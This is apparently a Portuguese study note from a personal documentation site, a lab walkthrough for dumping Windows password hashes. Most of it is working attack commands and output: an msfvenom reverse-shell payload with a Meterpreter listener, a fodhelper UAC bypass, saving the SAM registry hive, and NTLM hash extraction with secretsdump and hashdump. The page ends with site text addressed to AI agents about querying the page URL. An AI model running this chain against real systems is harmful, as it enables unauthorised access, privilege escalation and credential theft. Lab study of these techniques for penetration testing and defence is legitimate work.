# Obtendo hashes em sistemas modernos Para começar, vamos criar um laboratório propício para iniciar os métodos de captura de hashes. Nesse caso não temos acesso privilegiado no sistema. ``` msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=443 -f exe > arq.exe ``` ``` use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST set LPORT exploit ``` Podemos tentar executar o **hashdump** porém como não temos acesso privilegiado, não será possível. ``` meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. ``` Vamos tentar realizar uma função administrativa como, por exemplo salvar o SAM direto do registro. (hkml = HKEY-LOCAL-MACHINE) ``` C:\>reg save hklm\sam arqSam ERROR: Access is denied. ``` Dá acesso negado, então é necessário escalar para um privilégio administrativo para que isso seja possível. Vamos então procurar módulos para dar bypass no UAC (User Account Control). Para isso podemos usar o **background** sem matar a sessão. ``` meterpreter > background [*] Backgrounding session 1... msf6 exploit(multi/handler) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOM 192.168.2.134:666 -> 192.168.2.137:612 S 48 (192.168.2.137) msf6 exploit(multi/handler) > search uac ``` ``` msf6 exploit(windows/local/ask) > use exploit/windows/local/bypassuac_fodhelper [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_fodhelper) > show options Module options (exploit/windows/local/bypassuac_fodhelper): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.2.134 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows x86 msf6 exploit(windows/local/bypassuac_fodhelper) > set SESSION 1 SESSION => 1 msf6 exploit(windows/local/bypassuac_fodhelper) > show targets Exploit targets: Id Name -- ---- 0 Windows x86 1 Windows x64 msf6 exploit(windows/local/bypassuac_fodhelper) > set target 1 target => 1 msf6 exploit(windows/local/bypassuac_fodhelper) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_fodhelper) > exploit ``` Com isso, conseguimos dar bypass no UAC e obter os arquivos. ``` meterpreter > shell Process 2424 created. Channel 1 created. Microsoft Windows [vers�o 10.0.19043.1083] (c) Microsoft Corporation. Todos os direitos reservados. C:\Windows\system32>cd \ cd \ C:\>reg save hklm\sam sam1 reg save hklm\sam sam1 A opera��o foi conclu�da com �xito. ``` Com os dois arquivos, SAM e system, conseguimos as hashes utilizando o impacket-secretsdump ``` ┌──(user㉿kali)-[~/Desktop] └─$ impacket-secretsdump -sam sam1 -system system1 LOCAL 130 ⨯ Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Target system bootKey: 0xd34a2958235bcb73bb29ba99ea85df58 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:91831139e883c482ff011cf6801468dc::: trzwo:1001:aad3b435b51404eeaad3b435b51404ee:4469eae41ee734606dc5321bae42c5f3::: [*] Cleaning up... ``` O mesmo ocorre se utilizarmos o hashdump do meterpreter também. ``` meterpreter > hashdump Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: trzwo:1001:aad3b435b51404eeaad3b435b51404ee:4469eae41ee734606dc5321bae42c5f3::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:91831139e883c482ff011cf6801468dc::: ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://nicollaslopes.gitbook.io/estudos/master/hashes-e-senhas-windows/obtendo-hashes-em-sistemas-modernos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.